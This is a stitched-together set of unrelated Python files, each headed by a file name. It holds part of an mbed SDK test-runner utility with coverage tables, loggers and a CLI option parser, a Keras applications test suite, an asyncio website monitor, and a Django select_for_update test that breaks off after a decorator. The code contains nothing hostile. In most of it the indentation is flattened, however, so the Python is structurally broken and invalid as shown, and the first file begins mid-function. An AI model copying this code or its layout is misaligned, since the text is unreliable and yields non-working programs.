# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
            # Filter test IDs using the platform_filter regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if type(test[col]) == ListType:
col_value = join_delim.join(test[col])
            elif test[col] is None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
    step = int(percent_progress / 2)    # Scale the percentage to the 50-character bar width
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
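# Illustrative sketch (not part of the original code): progress_bar(50, saturation=75)
# builds a 50-character bar of 25 '#' followed by 25 '.' and inserts a one-character
# saturation marker ('!' or '|', chosen from the bar's fill level) at the 75% position.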
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print single_test.generate_test_summary(test_summary, shuffle_seed)
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
print
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
# Export build results as html report to sparate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
            or just handles all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from workspace_tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
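# Illustrative sketch (not part of the original code): a connection string in the form
# 'mysql://username:password@127.0.0.1/db_name' (the format quoted in the --db option help)
# parses into (db_type, username, password, host, db_name); only db_type == 'mysql'
# currently yields a driver (MySQLDBAccess), any other type returns None.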
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print "Connecting to database '%s'..."% db_url,
db_.connect(host, username, password, db_name)
if db_.is_connected():
print "ok"
print "Detecting database..."
print db_.detect_database(verbose=True)
print "Disconnecting...",
db_.disconnect()
print "done"
else:
print "Database type '%s' unknown"% db_type
else:
print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already impored module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
@param platform_name You can filter 'platform_name' with list of filtered targets from 'platform_name_filter'
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
# For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if its existing)
# if not we are creating our own unique value (last few chars from platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
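# Illustrative sketch (not part of the original code): for the sample mbed_lstools entry
# shown in the comment above, get_autodetected_MUTS would produce
# {1: {'mcu': 'NUCLEO_F302R8', 'mcu_unique': 'NUCLEO_F302R8[F72A]', 'port': u'COM34',
#      'disk': 'E:', 'peripherals': []}}
# i.e. a dictionary indexed from 1 in the same shape as a muts_all.json file.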
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter.split(','):
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
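# Illustrative sketch (not part of the original code): for a single detected board whose
# mcu is in TARGET_MAP, with use_default_toolchain=True and toolchain_filter='GCC_ARM,IAR',
# the result would look like {'targets': {<mcu>: [<default toolchain>, 'GCC_ARM', 'IAR']}}
# with duplicates removed by set(), and only those filter entries that appear among the
# target's supported toolchains are kept.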
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = optparse.OptionParser()
parser.add_option('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
help='Points to file with test specification')
parser.add_option('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_option("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type="int",
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_option('', '--auto',
dest='auto_detect',
metavar=False,
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
parser.add_option('', '--tc',
dest='toolchains_filter',
help="Toolchain filter for --auto option. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_option('', '--oper',
dest='operability_checks',
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_option('', '--clean',
dest='clean',
metavar=False,
action="store_true",
help='Clean the build directory')
parser.add_option('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_option('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
                      help='Test only board internals. Skip peripheral tests and perform common tests')
parser.add_option('-n', '--test-by-names',
dest='test_by_names',
                      help='Runs only the tests enumerated in this switch. Use commas to separate test case names')
parser.add_option('-p', '--peripheral-by-names',
dest='peripheral_by_names',
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_option('-c', '--copy-method',
dest='copy_method',
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_option('-r', '--reset-type',
dest='mut_reset_type',
default=None,
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_option('-g', '--goanna-for-tests',
dest='goanna_for_tests',
metavar=False,
action="store_true",
                      help='Run the Goanna static analysis tool for tests (the project will be rebuilt)')
parser.add_option('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
metavar=False,
action="store_true",
                      help='Run the Goanna static analysis tool for the mbed SDK (the project will be rebuilt)')
parser.add_option('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
                      help='Suppresses display of the well-formatted table with test results')
parser.add_option('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
                      help='Displays a well-formatted table with test x toolchain results per target')
parser.add_option('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_option('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_option("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_option("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_option('', '--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
                      help='Experimental: execute test runners in parallel for the MUTs connected to your host (speeds up test result collection)')
parser.add_option('', '--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
                      help='Displays the full test specification and MUTs configuration and exits')
parser.add_option('', '--loops',
dest='test_loops_list',
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_option('', '--global-loops',
dest='test_global_loops_value',
help='Set global number of test loops per test. Default value is set 1')
parser.add_option('', '--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall option. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_option('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops options. Tests until OK result occurs and assumes test passed')
parser.add_option('-N', '--firmware-name',
dest='firmware_global_name',
                      help='Set a global name for all produced projects. Note: the proper file extension will be added by the build scripts')
parser.add_option('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_option('', '--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_option('-f', '--filter',
dest='general_filter_regex',
default=None,
help='For some commands you can use filter to filter out results')
parser.add_option('', '--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type="int",
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_option('', '--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_option('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_option('', '--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_option('', '--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_option("", "--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_option('', '--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_option('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_option('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_option('', '--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
return parser
|
applications_test.py
|
import pytest
import random
import six
import numpy as np
import keras_applications
from keras.applications import densenet
from keras.applications import inception_resnet_v2
from keras.applications import inception_v3
from keras.applications import mobilenet
try:
from keras.applications import mobilenet_v2
except ImportError:
from keras.applications import mobilenetv2 as mobilenet_v2
from keras.applications import nasnet
from keras.applications import resnet50
from keras.applications import vgg16
from keras.applications import vgg19
from keras.applications import xception
from keras.preprocessing import image
from keras import backend
from keras import layers
from keras import models
from keras import utils
from multiprocessing import Process, Queue
def keras_modules_injection(base_fun):
def wrapper(*args, **kwargs):
kwargs['backend'] = backend
kwargs['layers'] = layers
kwargs['models'] = models
kwargs['utils'] = utils
return base_fun(*args, **kwargs)
return wrapper
for (name, module) in [('resnet', keras_applications.resnet),
('resnet_v2', keras_applications.resnet_v2),
('resnext', keras_applications.resnext),
('efficientnet', keras_applications.efficientnet),
('mobilenet_v3', keras_applications.mobilenet_v3)]:
module.decode_predictions = keras_modules_injection(module.decode_predictions)
module.preprocess_input = keras_modules_injection(module.preprocess_input)
for app in dir(module):
if app[0].isupper() and callable(getattr(module, app)):
setattr(module, app, keras_modules_injection(getattr(module, app)))
setattr(keras_applications, name, module)
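# Illustrative note (not part of the original code): after this injection loop, calling
# e.g. keras_applications.resnet.ResNet50(weights=None) works without explicitly passing
# backend/layers/models/utils, because keras_modules_injection fills those keyword
# arguments in with this test module's Keras objects.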
RESNET_LIST = [keras_applications.resnet.ResNet50,
keras_applications.resnet.ResNet101,
keras_applications.resnet.ResNet152]
RESNETV2_LIST = [keras_applications.resnet_v2.ResNet50V2,
keras_applications.resnet_v2.ResNet101V2,
keras_applications.resnet_v2.ResNet152V2]
RESNEXT_LIST = [keras_applications.resnext.ResNeXt50,
keras_applications.resnext.ResNeXt101]
MOBILENET_LIST = [(mobilenet.MobileNet, mobilenet, 1024),
(mobilenet_v2.MobileNetV2, mobilenet_v2, 1280),
(keras_applications.mobilenet_v3.MobileNetV3Small,
keras_applications.mobilenet_v3, 576),
(keras_applications.mobilenet_v3.MobileNetV3Large,
keras_applications.mobilenet_v3, 960)]
DENSENET_LIST = [(densenet.DenseNet121, 1024),
(densenet.DenseNet169, 1664),
(densenet.DenseNet201, 1920)]
NASNET_LIST = [(nasnet.NASNetMobile, 1056),
(nasnet.NASNetLarge, 4032)]
EFFICIENTNET_LIST = [(keras_applications.efficientnet.EfficientNetB0, 1280),
(keras_applications.efficientnet.EfficientNetB1, 1280),
(keras_applications.efficientnet.EfficientNetB2, 1408),
(keras_applications.efficientnet.EfficientNetB3, 1536),
(keras_applications.efficientnet.EfficientNetB4, 1792),
(keras_applications.efficientnet.EfficientNetB5, 2048)]
def keras_test(func):
"""Function wrapper to clean up after TensorFlow tests.
# Arguments
func: test function to clean up after.
# Returns
A function wrapping the input function.
"""
@six.wraps(func)
def wrapper(*args, **kwargs):
output = func(*args, **kwargs)
if backend.backend() == 'tensorflow' or backend.backend() == 'cntk':
backend.clear_session()
return output
return wrapper
def _get_elephant(target_size):
# For models that don't include a Flatten step,
# the default is to accept variable-size inputs
# even when loading ImageNet weights (since it is possible).
# In this case, default to 299x299.
if target_size[0] is None:
target_size = (299, 299)
img = image.load_img('tests/data/elephant.jpg',
target_size=tuple(target_size))
x = image.img_to_array(img)
return np.expand_dims(x, axis=0)
def _get_output_shape(model_fn, preprocess_input=None):
if backend.backend() == 'cntk':
# Create model in a subprocess so that
# the memory consumed by InceptionResNetV2 will be
# released back to the system after this test
# (to deal with OOM error on CNTK backend).
# TODO: remove the use of multiprocessing from these tests
# once a memory clearing mechanism
# is implemented in the CNTK backend.
def target(queue):
model = model_fn()
if preprocess_input is None:
queue.put(model.output_shape)
else:
x = _get_elephant(model.input_shape[1:3])
x = preprocess_input(x)
queue.put((model.output_shape, model.predict(x)))
queue = Queue()
p = Process(target=target, args=(queue,))
p.start()
p.join()
# The error in a subprocess won't propagate
# to the main process, so we check if the model
# is successfully created by checking if the output shape
# has been put into the queue
assert not queue.empty(), 'Model creation failed.'
return queue.get_nowait()
else:
model = model_fn()
if preprocess_input is None:
return model.output_shape
else:
x = _get_elephant(model.input_shape[1:3])
x = preprocess_input(x)
return (model.output_shape, model.predict(x))
@keras_test
def _test_application_basic(app, last_dim=1000, module=None):
if module is None:
output_shape = _get_output_shape(lambda: app(weights=None))
assert output_shape == (None, None, None, last_dim)
else:
output_shape, preds = _get_output_shape(
lambda: app(weights='imagenet'), module.preprocess_input)
assert output_shape == (None, last_dim)
names = [p[1] for p in module.decode_predictions(preds)[0]]
# Test correct label is in top 3 (weak correctness test).
assert 'African_elephant' in names[:3]
@keras_test
def _test_application_notop(app, last_dim):
output_shape = _get_output_shape(
lambda: app(weights=None, include_top=False))
assert output_shape == (None, None, None, last_dim)
@keras_test
def _test_application_variable_input_channels(app, last_dim):
if backend.image_data_format() == 'channels_first':
input_shape = (1, None, None)
else:
input_shape = (None, None, 1)
output_shape = _get_output_shape(
lambda: app(weights=None, include_top=False, input_shape=input_shape))
assert output_shape == (None, None, None, last_dim)
if backend.image_data_format() == 'channels_first':
input_shape = (4, None, None)
else:
input_shape = (None, None, 4)
output_shape = _get_output_shape(
lambda: app(weights=None, include_top=False, input_shape=input_shape))
assert output_shape == (None, None, None, last_dim)
@keras_test
def _test_app_pooling(app, last_dim):
output_shape = _get_output_shape(
lambda: app(weights=None,
include_top=False,
pooling=random.choice(['avg', 'max'])))
assert output_shape == (None, last_dim)
def test_resnet():
app = random.choice(RESNET_LIST)
module = keras_applications.resnet
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_resnetv2():
app = random.choice(RESNETV2_LIST)
module = keras_applications.resnet_v2
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_resnext():
app = random.choice(RESNEXT_LIST)
module = keras_applications.resnext
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_vgg():
app = random.choice([vgg16.VGG16, vgg19.VGG19])
module = vgg16
last_dim = 512
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_xception():
app = xception.Xception
module = xception
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_inceptionv3():
app = inception_v3.InceptionV3
module = inception_v3
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_inceptionresnetv2():
app = inception_resnet_v2.InceptionResNetV2
module = inception_resnet_v2
last_dim = 1536
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_mobilenet():
app, module, last_dim = random.choice(MOBILENET_LIST)
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_densenet():
app, last_dim = random.choice(DENSENET_LIST)
module = densenet
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_nasnet():
app, last_dim = NASNET_LIST[0] # NASNetLarge is too heavy to test on Travis
module = nasnet
_test_application_basic(app, module=module)
# _test_application_notop(app, last_dim)
# _test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_efficientnet():
app, last_dim = random.choice(EFFICIENTNET_LIST)
module = keras_applications.efficientnet
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
if __name__ == '__main__':
pytest.main([__file__])
|
web_monitor.py
|
"""
Creates the logger, processes and threads, initializes everything
"""
import asyncio
import logging
import time
from multiprocessing import Process
import aiohttp
import async_timeout
from src.web_monitor.server import server
from src.web_monitor.utils.custom_errors import ConnectionProblem
async def fetch(session, url, timeout_s, content):
log = logging.getLogger(__name__)
try:
with async_timeout.timeout(timeout_s):
start_time = time.time()
async with session.get(url) as response:
if response.status != 200:
                    raise ConnectionProblem(url, "HTTP status code: {}".format(response.status))
text = await response.text()
end_time = time.time()
except ConnectionProblem as ex:
raise ex
except (asyncio.TimeoutError, aiohttp.ClientConnectorError) as ex:
if isinstance(ex, asyncio.TimeoutError):
msg = type(ex)
else:
msg = str(ex)
raise ConnectionProblem(url, msg)
content_ok = content in text
log.info('%s\t%s\t%s', url, content_ok, end_time - start_time)
async def do_request(url, period_ms, timeout_s, content):
async with aiohttp.ClientSession() as session:
log = logging.getLogger(__name__)
while True:
await asyncio.sleep(period_ms / 1000)
future = asyncio.ensure_future(fetch(session, url, timeout_s, content))
def callback(fut):
ex = fut.exception()
if isinstance(ex, ConnectionProblem):
log.error('%s\tConnection problem\tSpecific error: %s', ex.url, ex.error_msg)
elif ex:
log.critical('%s\tUNKNOWN ERROR', url)
future.add_done_callback(callback)
def start_app(config):
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
console_h = logging.StreamHandler()
console_h.setLevel(logging.DEBUG)
log_path = config['general']['log_path']
file_h = logging.FileHandler(log_path, 'w')
file_h.setLevel(config['general']['file_log_level'])
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
console_h.setFormatter(formatter)
file_h.setFormatter(formatter)
log.addHandler(console_h)
log.addHandler(file_h)
period_ms = int(config['general']['checking_period'])
timeout_s = int(config['general']['timeout'])
web_dict = config['url_content']
loop = asyncio.get_event_loop()
futures = []
for url, content in web_dict.items():
log.debug('Key: %s', url)
future = asyncio.ensure_future(do_request(url, period_ms, timeout_s, content))
futures.append(future)
loop.run_until_complete(asyncio.gather(*futures, return_exceptions=True))
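# Illustrative sketch (not part of the original code): start_app expects a config mapping
# shaped roughly like
# {'general': {'log_path': 'monitor.log', 'file_log_level': 'INFO',
#              'checking_period': '5000', 'timeout': '10'},
#  'url_content': {'http://example.com': 'Example Domain'}}
# where checking_period is in milliseconds and timeout in seconds, as read above.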
def main(config):
processes = []
server_process = Process(target=server.create_app)
server_process.start()
processes.append(server_process)
    requests_process = Process(target=start_app, args=(config,))
    requests_process.start()
    processes.append(requests_process)
    for process in processes:
        process.join()
|
tests.py
|
from __future__ import unicode_literals
import sys
import time
import unittest
from django.conf import settings
from django.db import transaction, connection
from django.db.utils import ConnectionHandler, DEFAULT_DB_ALIAS, DatabaseError
from django.test import (TransactionTestCase, skipIfDBFeature,
skipUnlessDBFeature)
from .models import Person
# Some tests require threading, which might not be available. So create a
# skip-test decorator for those test functions.
try:
import threading
except ImportError:
threading = None
requires_threading = unittest.skipUnless(threading, 'requires threading')
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
transaction.enter_transaction_management()
self.person = Person.objects.create(name='Reinhardt')
# We have to commit here so that code in run_select_for_update can
# see this data.
transaction.commit()
# We need another database connection to test that one connection
# issuing a SELECT ... FOR UPDATE will block.
new_connections = ConnectionHandler(settings.DATABASES)
self.new_connection = new_connections[DEFAULT_DB_ALIAS]
self.new_connection.enter_transaction_management()
# We need to set settings.DEBUG to True so we can capture
# the output SQL to examine.
self._old_debug = settings.DEBUG
settings.DEBUG = True
def tearDown(self):
try:
# We don't really care if this fails - some of the tests will set
# this in the course of their run.
transaction.abort()
self.new_connection.abort()
except transaction.TransactionManagementError:
pass
self.new_connection.close()
settings.DEBUG = self._old_debug
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
def start_blocking_transaction(self):
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.new_connection.rollback()
def has_for_update_sql(self, tested_connection, nowait=False):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = tested_connection.ops.for_update_sql(nowait)
sql = tested_connection.queries[-1]['sql']
return bool(sql.find(for_update_sql) > -1)
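    # Illustrative note (not part of the original code): with settings.DEBUG enabled in
    # setUp(), connection.queries records the executed SQL, so has_for_update_sql() simply
    # checks whether the last query contains the backend's FOR UPDATE (or FOR UPDATE NOWAIT)
    # clause returned by ops.for_update_sql().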
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
Test that the backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(connection))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
Test that the backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(connection, nowait=True))
@requires_threading
